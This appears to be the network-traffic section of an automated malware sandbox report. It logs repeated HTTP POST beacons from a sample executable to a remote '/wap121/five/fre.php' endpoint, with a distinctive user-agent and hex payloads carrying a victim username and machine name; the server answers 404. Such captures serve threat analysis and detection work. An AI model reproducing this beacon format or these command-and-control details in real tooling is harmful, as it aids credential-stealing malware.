                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          59 | 192.168.2.4 | 49828 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:20.599287033 CET | 6216 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:20.937680960 CET | 6217 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:21.306483984 CET | 6217 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          6 | 192.168.2.4 | 49753 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:10.753897905 CET | 1542 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:11.089572906 CET | 1542 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:11.455200911 CET1542INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:11 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          60 | 192.168.2.4 | 49829 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:21.882520914 CET | 6218 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:22.227998972 CET | 6218 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:22.606409073 CET | 6218 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          61 | 192.168.2.4 | 49830 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:23.176364899 CET | 6219 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:23.515377998 CET | 6220 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:23.883021116 CET | 6220 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          62 | 192.168.2.4 | 49831 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:24.482439995 CET | 6221 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:24.822552919 CET | 6221 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:25.190963030 CET | 6221 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          63 | 192.168.2.4 | 49832 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:25.733887911 CET | 6222 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:26.068434000 CET | 6222 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:26.446412086 CET | 6223 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          64 | 192.168.2.4 | 49833 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:27.016300917 CET | 6224 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:27.351428986 CET | 6224 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:27.717015982 CET | 6224 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          65 | 192.168.2.4 | 49834 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:28.298521042 CET | 6225 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:28.636457920 CET | 6225 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:29.005323887 CET | 6226 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          66 | 192.168.2.4 | 49835 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:29.542202950 CET | 6227 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:29.876545906 CET | 6227 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:30.244988918 CET | 6235 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          67 | 192.168.2.4 | 49837 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:30.810538054 CET | 6239 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:31.145735979 CET | 6240 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:31.511131048 CET | 6240 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          68 | 192.168.2.4 | 49839 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:32.137482882 CET | 6250 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:32.474783897 CET | 6251 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:32.846445084 CET | 6251 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          69 | 192.168.2.4 | 49840 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:33.411950111 CET | 6252 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:33.749093056 CET | 6252 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:34.116691113 CET | 6252 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          7 | 192.168.2.4 | 49754 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:12.128792048 CET | 1543 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:12.465974092 CET | 1543 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:12.833798885 CET | 1544 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          70 | 192.168.2.4 | 49841 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:34.725025892 CET | 6253 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:35.073873043 CET | 6254 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:35.450486898 CET | 6254 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          71 | 192.168.2.4 | 49842 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:36.028479099 CET | 6255 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:36.364825964 CET | 6255 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:36.741519928 CET | 6255 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          72 | 192.168.2.4 | 49843 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:37.334441900 CET | 6256 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:37.668834925 CET | 6257 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:38.034826040 CET | 6257 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          73 | 192.168.2.4 | 49844 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:38.623261929 CET | 6258 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:38.961205006 CET | 6258 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:39.339082003 CET | 6258 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
74 | 192.168.2.4 | 49845 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:39.953346014 CET | 6259 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:40.299132109 CET | 6260 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:40.683614016 CET | 6260 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
75 | 192.168.2.4 | 49846 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:41.267887115 CET | 6261 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
